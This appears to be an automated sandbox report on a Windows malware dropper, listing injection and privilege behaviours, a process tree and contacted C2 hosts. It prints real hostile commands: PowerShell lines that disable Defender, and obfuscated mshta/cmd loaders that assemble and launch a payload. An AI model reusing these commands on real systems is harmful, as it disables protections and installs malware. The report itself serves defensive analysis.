| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1104 set thread context of 4180 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe |
| PID 980 set thread context of 3196 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe |
| PID 4184 set thread context of 1528 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed098e48a54663552b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0961d5d40c7b937c7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed096e68af113.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe
Wed0937c2dc68a2496.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe
Wed09a48dab921a3bda7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2600 -ip 2600
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe
Wed09a6fb1d0dd846.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0988d1c2bd9a37.exe
Wed0988d1c2bd9a37.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed098e48a54663552b.exe
Wed098e48a54663552b.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe
Wed094d15aaa9a48.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe
Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe
Wed096e68af113.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe
Wed0911cd5800a45.exe
C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$40288,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 572
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0961d5d40c7b937c7.exe
Wed0961d5d40c7b937c7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3152 -ip 3152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 244
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$A0112,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"
C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -IM "Wed0911cd5800a45.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct( "wSCRIPT.SHEll").RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W ",0 , True ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eChO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"
C:\Windows\SysWOW64\msiexec.exe
msiexec /y ..\_enU.W
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv z76pfHFsR0SkYGbr62ILBA.0.2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sayanu.xyz | udp |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| NL | 45.133.1.107:80 | | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| NL | 194.104.136.5:46013 | | tcp |
| N/A | 127.0.0.1:59128 | | tcp |
| N/A | 127.0.0.1:59130 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| FR | 51.178.186.149:80 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | 70.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 60.37.61.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
